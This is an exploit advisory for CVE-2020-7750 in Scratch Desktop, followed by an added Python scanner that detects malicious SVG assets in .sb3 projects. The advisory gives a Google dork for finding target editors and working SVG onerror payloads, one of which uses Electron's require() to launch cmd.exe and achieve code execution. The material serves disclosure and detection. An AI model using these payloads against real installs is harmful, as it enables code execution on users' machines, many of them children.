Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution Vulnerabilities

Published: 02 Jul 2021 00:00:00 | Reported by: Stig Magnus Baugstø | Type: zdt | Source: 0day.today | 99 views


Related records

  Source                Title                                                        Published
  Circl                 CVE-2020-7750                                                21 Sep 2021 04:42
  CVE                   CVE-2020-7750                                                21 Oct 2020 16:20
  Cvelist               CVE-2020-7750 Cross-site Scripting (XSS)                     21 Oct 2020 16:20
  Exploit DB            Scratch Desktop 3.17 - Remote Code Execution                 02 Jul 2021 00:00
  EUVD                  EUVD-2020-1459                                               07 Oct 2025 00:30
  Github Security Blog  Cross-Site Scripting in scratch-svg-renderer                 09 Nov 2020 14:21
  Node.js               Cross-Site Scripting in scratch-svg-renderer                 09 Nov 2020 14:24
  NVD                   CVE-2020-7750                                                21 Oct 2020 17:15
  OSV                   GHSA-J977-G5VJ-J27G Cross-Site Scripting in scratch-svg-renderer  09 Nov 2020 14:21
  Packet Storm          Scratch Desktop 3.17 Code Execution / Cross Site Scripting   02 Jul 2021 00:00

# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750

Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008

CVE-2020-7750 was disclosed on Scratch's official forums on the 21st of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/

The vulnerability is exploited by uploading an SVG (*.svg) file WITHOUT a viewBox attribute and embedding a malicious event handler in it. The handler only fires when viewBox is absent, so do not add one. Example:

	<!-- no viewBox attribute on the root element: this is what reaches the unsanitised code path -->
	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<!-- the image never loads, so the onerror handler always runs -->
		<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
	</svg>

The malicious SVG can be uploaded directly as a sprite, or stored inside a Scratch project file (*.sb3), which is an ordinary ZIP archive and can be edited with any ZIP tool.
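As an added detection example (not part of the original advisory, and not code from Scratch or scratch-svg-renderer): a Python scanner that unpacks an .sb3 archive and flags SVG assets with the shape described above, i.e. no viewBox on the root element combined with an event-handler attribute, a <script> element or a javascript: href. The .sb3 fixture, its stub project.json and the asset file names are constructed for the example; real archives name assets by content hash.

```python
"""Scan a Scratch .sb3 project (a ZIP archive) for SVG assets carrying the
CVE-2020-7750 payload shape: no viewBox attribute plus a JavaScript event
handler, a <script> element or a javascript: href.  Added example, not
project code."""
import io
import json
import re
import zipfile
import xml.etree.ElementTree as ET  # for untrusted files prefer defusedxml (entity-expansion safety)

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)      # onerror, onload, onclick, ...
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"           # ElementTree form of xlink:href


def _local(name: str) -> str:
    """Strip an ElementTree namespace prefix: '{ns}tag' -> 'tag'."""
    return name.rsplit("}", 1)[-1]


def inspect_svg(data: bytes) -> dict:
    """Report what would make this SVG dangerous to a renderer that does not sanitise it."""
    root = ET.fromstring(data)
    report = {
        "has_viewbox": "viewBox" in root.attrib,
        "event_handlers": [],    # (element, attribute) pairs such as ('image', 'onerror')
        "script_elements": 0,
        "javascript_hrefs": [],  # elements whose href/xlink:href starts with javascript:
    }
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag == "script":
            report["script_elements"] += 1
        for attr, value in elem.attrib.items():
            if EVENT_ATTR.match(_local(attr)):
                report["event_handlers"].append((tag, _local(attr).lower()))
            elif attr in ("href", XLINK_HREF) and value.strip().lower().startswith("javascript:"):
                report["javascript_hrefs"].append(tag)
    report["suspicious"] = bool(
        report["event_handlers"] or report["script_elements"] or report["javascript_hrefs"]
    )
    # The missing viewBox is the precondition for the vulnerable path in
    # scratch-svg-renderer < 0.2.0-prerelease.20201019174008; a patched renderer
    # should still reject the handler, so "suspicious" is reported on its own too.
    report["cve_2020_7750_shape"] = report["suspicious"] and not report["has_viewbox"]
    return report


def scan_sb3(sb3_bytes: bytes) -> list:
    """Inspect every .svg asset inside an .sb3 archive; one report per asset."""
    results = []
    with zipfile.ZipFile(io.BytesIO(sb3_bytes)) as archive:
        for info in archive.infolist():
            if info.filename.lower().endswith(".svg"):
                report = inspect_svg(archive.read(info))
                report["asset"] = info.filename
                results.append(report)
    return results


def build_sample_sb3(assets: dict) -> bytes:
    """Constructed fixture: a minimal .sb3 with a stub project.json plus the given assets."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("project.json", json.dumps({"targets": [], "meta": {"semver": "3.0.0"}}))
        for name, data in assets.items():
            archive.writestr(name, data)
    return buf.getvalue()


# Constructed sample inputs: the advisory's payload shape (alert() stands in for any payload)
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
    <rect width="10" height="10" fill="#f00" />
</svg>"""

SAMPLE_SB3 = build_sample_sb3({"evil.svg": MALICIOUS_SVG, "costume.svg": BENIGN_SVG})

if __name__ == "__main__":
    for r in scan_sb3(SAMPLE_SB3):
        verdict = "CVE-2020-7750 shape" if r["cve_2020_7750_shape"] else "ok"
        print(f"{r['asset']}: {verdict} handlers={r['event_handlers']} viewBox={r['has_viewbox']}")
```

The scanner flags any handler regardless of viewBox, because an SVG that carries onerror in a costume has no legitimate reason to exist; the viewBox check only tells you whether the asset would have fired on an unpatched renderer.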

Example of regular cross-site scripting (XSS):

	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<image href="doesNotExist.png" onerror="alert('Pwned!')" />
	</svg>

Scratch Desktop runs on Electron, and its renderer exposes Node's require(), so the same injection becomes remote code execution (RCE):

	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
	</svg>

The example above launches cmd.exe (Command Prompt) on Windows through Electron's shell.openExternal(); any other Node or Electron API reachable through require() can be called the same way.

For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/

Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
